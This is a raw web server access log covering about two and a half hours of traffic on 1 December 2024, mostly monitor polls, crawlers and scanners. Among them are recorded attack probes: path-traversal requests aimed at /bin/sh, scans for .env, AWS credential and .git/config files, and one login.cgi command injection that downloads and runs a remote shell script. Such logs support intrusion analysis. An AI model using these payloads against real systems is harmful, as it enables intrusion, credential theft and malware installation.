212.91.246.72 - - [01/Dec/2024:00:00:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:01:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:02:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.137.103.38 - - [01/Dec/2024:00:02:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Dec/2024:00:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:04:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.251.229.88 - - [01/Dec/2024:00:05:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Dec/2024:00:05:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:06:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.34.107.46 - - [01/Dec/2024:00:06:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
146.200.16.233 - - [01/Dec/2024:00:06:58 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [01/Dec/2024:00:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:00:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:00:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:09:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:10:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.202 - - [01/Dec/2024:00:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:00:11:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:13:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.65.77 - - [01/Dec/2024:00:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
45.83.66.214 - - [01/Dec/2024:00:13:48 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
95.214.53.202 - - [01/Dec/2024:00:14:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:00:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:15:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:16:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:00:17:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.134.19 - - [01/Dec/2024:00:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.134.19 - - [01/Dec/2024:00:20:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.154.134.19 - - [01/Dec/2024:00:20:24 +0100] "t3 12.1.2" 400 329 "-" "-"
101.36.106.134 - - [01/Dec/2024:00:20:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/583.55 (KHTML, like Gecko) Chrome/84.0.395 Safari/537.36"
101.36.106.134 - - [01/Dec/2024:00:20:32 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.106.134 - - [01/Dec/2024:00:20:32 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
101.36.106.134 - - [01/Dec/2024:00:20:32 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
43.159.132.207 - - [01/Dec/2024:00:25:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
91.238.181.35 - - [01/Dec/2024:00:27:46 +0100] "\x03" 501 316 "-" "-"
114.33.17.89 - - [01/Dec/2024:00:32:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
57.129.64.10 - - [01/Dec/2024:00:34:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
199.45.154.148 - - [01/Dec/2024:00:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.148 - - [01/Dec/2024:00:39:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.148 - - [01/Dec/2024:00:39:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.148 - - [01/Dec/2024:00:39:01 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
80.82.77.202 - - [01/Dec/2024:00:46:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
71.6.134.231 - - [01/Dec/2024:00:46:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
47.236.232.202 - - [01/Dec/2024:00:47:22 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
80.82.77.202 - - [01/Dec/2024:00:47:48 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
80.82.77.202 - - [01/Dec/2024:00:48:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
141.98.11.35 - - [01/Dec/2024:00:49:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [01/Dec/2024:00:49:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:00:50:00 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:00:50:00 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0"
87.120.113.56 - - [01/Dec/2024:00:50:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; LG-H930) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:00:50:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
87.120.113.56 - - [01/Dec/2024:00:50:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36"
80.82.77.202 - - [01/Dec/2024:00:50:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36"
35.203.210.212 - - [01/Dec/2024:00:54:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
46.101.157.195 - - [01/Dec/2024:00:57:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
87.120.113.56 - - [01/Dec/2024:00:58:21 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J710FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:00:59:36 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; moto g(7) power) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:00:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SM-A505FM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:00:30 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.19 Safari/537.36 Edg/77.0.235.9"
87.120.113.56 - - [01/Dec/2024:01:00:30 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0"
87.120.113.56 - - [01/Dec/2024:01:00:30 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1"
87.120.113.56 - - [01/Dec/2024:01:01:26 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.2.516 Yowser/2.5 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:01:27 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:03:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
87.120.113.56 - - [01/Dec/2024:01:03:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
71.6.134.231 - - [01/Dec/2024:01:04:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:04:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)"
87.120.113.56 - - [01/Dec/2024:01:04:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]"
87.120.113.56 - - [01/Dec/2024:01:04:45 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
71.6.134.231 - - [01/Dec/2024:01:04:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:05:07 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:01:05:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
147.185.133.46 - - [01/Dec/2024:01:05:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.208.156.160 - - [01/Dec/2024:01:07:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.208.156.160 - - [01/Dec/2024:01:07:02 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
95.214.53.202 - - [01/Dec/2024:01:07:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
38.46.220.87 - - [01/Dec/2024:01:13:24 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
38.46.220.87 - - [01/Dec/2024:01:14:07 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
46.19.138.234 - - [01/Dec/2024:01:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.202 - - [01/Dec/2024:01:18:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
66.249.66.87 - - [01/Dec/2024:01:22:36 +0100] "GET /robots.txt HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.88 - - [01/Dec/2024:01:22:36 +0100] "GET /chat.f-m-shop.de/log/2010/03/web.log HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.89 - - [01/Dec/2024:01:22:37 +0100] "GET /ftp.druckerei-braul.de/ssl/ HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.87 - - [01/Dec/2024:01:22:37 +0100] "GET /web41/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.98.11.35 - - [01/Dec/2024:01:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.35 - - [01/Dec/2024:01:28:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [01/Dec/2024:01:28:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.202 - - [01/Dec/2024:01:31:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:01:31:42 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
194.50.16.198 - - [01/Dec/2024:01:32:03 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
46.19.138.234 - - [01/Dec/2024:01:32:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.202 - - [01/Dec/2024:01:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [01/Dec/2024:01:36:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.69 - - [01/Dec/2024:01:36:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.69 - - [01/Dec/2024:01:36:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
95.214.53.202 - - [01/Dec/2024:01:38:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.35 - - [01/Dec/2024:01:39:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:01:41:12 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
205.210.31.253 - - [01/Dec/2024:01:41:56 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
194.50.16.198 - - [01/Dec/2024:01:42:30 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
194.50.16.198 - - [01/Dec/2024:01:43:01 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
170.64.207.27 - - [01/Dec/2024:01:44:37 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
46.19.138.234 - - [01/Dec/2024:01:44:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
76.11.185.195 - - [01/Dec/2024:01:45:16 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.156.130.8 - - [01/Dec/2024:01:47:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.53.202 - - [01/Dec/2024:01:48:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [01/Dec/2024:01:50:38 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
78.153.140.177 - - [01/Dec/2024:01:53:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [01/Dec/2024:01:53:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:01:53:15 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 4.4; LGL34C Build/KRT16S.L34CV10c) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.103 Mobile Safari/537.36"
78.153.140.177 - - [01/Dec/2024:01:53:15 +0100] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko"
78.153.140.177 - - [01/Dec/2024:01:53:16 +0100] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.10.506.1 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [01/Dec/2024:01:53:16 +0100] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/6.2.8 Safari/537.85.17"
78.153.140.177 - - [01/Dec/2024:01:53:16 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B137 Safari/601.1"
78.153.140.177 - - [01/Dec/2024:01:53:16 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1218"
78.153.140.177 - - [01/Dec/2024:01:53:17 +0100] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux armv7l; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
78.153.140.177 - - [01/Dec/2024:01:53:17 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 7.1.1; N9560 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36"
78.153.140.177 - - [01/Dec/2024:01:53:18 +0100] "GET /.env.testing HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; ME173X Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.177 - - [01/Dec/2024:01:53:18 +0100] "GET /.env~ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
78.153.140.177 - - [01/Dec/2024:01:53:18 +0100] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2"
78.153.140.177 - - [01/Dec/2024:01:53:19 +0100] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; CrOS armv7l 10032.75.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.116 Safari/537.36"
59.126.47.168 - - [01/Dec/2024:01:53:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
46.19.138.234 - - [01/Dec/2024:01:54:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.202 - - [01/Dec/2024:01:58:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
154.221.31.223 - - [01/Dec/2024:02:01:01 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
141.98.11.35 - - [01/Dec/2024:02:01:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.35 - - [01/Dec/2024:02:02:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:02:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
59.126.12.104 - - [01/Dec/2024:02:03:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
194.50.16.198 - - [01/Dec/2024:02:05:30 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
141.98.11.35 - - [01/Dec/2024:02:05:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
59.126.72.231 - - [01/Dec/2024:02:06:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
95.214.53.202 - - [01/Dec/2024:02:08:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.202 - - [01/Dec/2024:02:09:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.50.16.198 - - [01/Dec/2024:02:13:18 +0100] "GET /login.asp HTTP/1.1" 404 314 "-" "-"
46.19.138.234 - - [01/Dec/2024:02:13:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [01/Dec/2024:02:14:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.135.85.137 - - [01/Dec/2024:02:17:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
141.98.11.35 - - [01/Dec/2024:02:21:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [01/Dec/2024:02:24:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
